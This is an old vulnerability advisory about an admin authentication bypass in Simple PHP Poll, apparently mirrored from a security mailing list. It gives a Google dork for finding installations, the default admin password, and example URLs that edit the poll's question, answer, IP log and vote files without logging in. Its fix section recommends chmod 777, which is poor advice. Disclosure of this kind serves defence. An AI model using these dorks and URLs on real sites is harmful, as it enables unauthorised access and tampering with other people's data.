Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13228
HistoryJun 17, 2006 - 12:00 a.m.

Simple PHP Poll Authecnication Admin ByPass

2006-06-1700:00:00
vulners.com
12

Simple PHP Poll
http://www.cgixp.tk/

DESCRIPTION:

google dork = "Poewred By: Simple PHP Poll" and "Powered By: Simple PHP Poll"

administrator login path /poll_admin.php login to default admin pass "administrator" or add to ;

?action=edit&filename=question.txt(questions page)
?action=edit&filename=ans.txt (poll answer)
?action=edit&filename=logger.txt (ip log)
?action=edit&filename=poll_data.txt(poll vote data)

example: http://www.site.com/poll_admin.php?action=edit&filename=question.txt
example: http://www.site.com/poll_admin.php?action=edit&filename=ans.txt
example: http://www.site.com/poll_admin.php?action=edit&filename=logger.txt
example: http://www.site.com/poll_admin.php?action=edit&filename=poll_data.txt

SOLUTION

poll_admin.php line 5($password = "administrator") change default administrator pass, and change to
default "ans,logger,poll_data,questions.txt" file name. new files upload to ftp and chmod777
#################################################

Credits:AlpEren and tugr@
Site: http://www.ayyildiz.org
http://www.ayyildiz-team.org
Special thanx to metlak,thehacker,shadow,tugr@,FermaN,ATAKAN,GenTьrk and All AYYILDIZ member.

Damn with PKK, damn with terrorism.